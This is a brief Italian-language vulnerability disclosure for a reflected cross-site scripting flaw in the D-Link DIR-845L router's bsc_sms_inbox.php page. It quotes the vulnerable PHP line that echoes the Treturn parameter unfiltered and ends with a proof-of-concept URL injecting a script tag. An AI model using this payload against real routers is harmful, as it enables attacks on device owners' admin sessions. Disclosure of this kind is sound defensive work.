
Il router D-Link DIR-845L è vulnerabile a Cross Site Scripting (XSS) tramite /htdocs/webinc/js/bsc_sms_inbox.php.
I router D-Link DIR-845L versione 1.01KRb03 e precedenti sono vulnerabili a Cross Site Scripting (XSS) tramite /htdocs/webinc/js/bsc_sms_inbox.php.
/htdocs/webinc/js/bsc_sms_inbox.phpLa vulnerabilità è dovuta alla mancanza di filtraggio nel parametro $_GET["Treturn"] che viene utilizzato direttamente nel codice alla riga 17 di bsc_sms_inbox.php.
Lo snippet di codice vulnerabile:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
